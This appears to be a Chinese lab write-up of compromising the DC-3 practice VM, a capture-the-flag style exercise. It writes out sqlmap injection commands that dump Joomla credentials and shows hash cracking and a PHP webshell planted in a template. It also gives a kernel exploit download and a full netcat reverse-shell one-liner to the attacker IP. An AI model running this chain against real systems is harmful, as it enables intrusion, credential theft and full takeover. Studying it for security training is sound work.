渗透测试实战-DC-3
一,下载资料
链接:https://pan.baidu.com/s/1PknSNyAl0Me3wf_8SHenLQ
提取码:zcka
二,环境搭建:靶机:172.16.43.145
攻击机kali:172.16.43.70
三,信息收集
(1)当前网络活跃主机:nmap -sP 172.16.43.0/24 -oN nmap.sP
![](https://i-blog.csdnimg.cn/blog_migrate/6e139e516de5e76a3bd41993504f34c5.png)
(2)扫描端口服务:nmap -A 172.16.43.141 -p 1-65535 -oN nmap.A
80 好像就开了80端口了
(3)在访问80网址:http://172.16.43.145
信息收集:是看不出来是什么框架
(4)kali工具: 攻防演练中:识别该网站的信息 用whatweb工具
输入命令:whatweb http://172.16.43.145
有各种关于网站的各种信息: apache Ubuntu Joomla开源内容管理
(5)利用joomscan工具进行网站的简单扫描
输入命令:joomscan --url http://172.16.43.145
没有防护墙,joomla目前版本和 扫描出来的一些目录 网站后台等等
(6)看看这里面的目录http://172.16.43.145/administrator/components/
(7)找到了网站的后台:http://172.16.43.145/administrator/modules
(8)可以尝试爆破,这一招,放到最后吧。看看有没有相关爆出的开源漏洞
具备sql注入漏洞:
输入命令:cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla-sqli.txt
有一个CVE-2017-8917
(9)可以sqlmap进行sql注入攻击了,一路点yes即可
sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
(10)爆出库中的表名
sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D --tables -p list[fullordering]
(11)爆出库中的字段名
sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
(12)爆出字段名
sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password" --dump -p list[fullordering]
(13)将hash值写到一个文件里面去
输入命令:vim user_password.txt
(14)利用john工具进行解密文件
输入命令:John user_password.txt
后台账户:admin 密码:snoopy
(15)可以登录后台试一试
(16)可以找后台找一找
(17)看看可以不可以修改这些文件:上传个大马或者小马..需要找到绝对路径
猜测:一般网站模板文件,应该是放在根目录下的,172.16.43.145/templates
(18)试一试是不是在根目录
(19)找到这个路径有com_contact/这个文件
可以新建个文件xiaoma.php
(20)可以编辑这个xiaoma.php文件
编写完成
(21)访问一下:http://172.16.43.145/templates/beez3/xiaoma.php
由此可以访问成功
(22)用中国蚁剑进行连接
(23)看看虚拟终端
看看权限,是不是这个IP地址 sudo -l, history,netstat -antup 看看有没有什么可以提权的
四,提权
(1)查看内核版本信息 Linux 4.4.0-21
输入命令:uname -a
(2)查ubuntu 16.04版本
(3)下载到本地即可
输入命令: searchsploit -m 39772.txt
(4)看看文件好像让我们下载个zip文件
Wget 进行下载:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
(5)下载的是一个zip文件,里面有两个文件,分别为 exploit.tar, crasher.tat,这次提权我们只需要用到 exploit.tar,所以把这个文件上传到靶机上。
(6)上传到靶机
(7)对文件进行编译
输入命令:./compile.sh
(8)开始提权:
输入命令:./doubleput
(9)这里执行doubleput后虽然提示提权成功,但是查看还是www-data用户,继续进行
后来想到在靶机上反弹shell到攻击机上
(10)本地需要kali监听
输入命令:ncat -lvvp 44444
![](https://i-blog.csdnimg.cn/blog_migrate/e59f7a4939d90307c7a8faee92740b61.png)
(11)反弹shell
输入命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.43.70 44444 >/tmp/f
(12)开启交互模式:
输入命令:python -c 'import pty;pty.spawn("/bin/bash")'
输入命令:./doubleput
(13)查看根目录
输入命令:cat the-flag.txt
总结:
1,根据80端口- whatweb工具查找相关版本漏洞 – joomscan工具查找相关漏洞
2,sql注入-后台登录-再去收集有用信息 -上传木马- ls -a 敏感文件 sudo -l history命令
3提权:下载的是一个zip文件-反弹-执行命令提权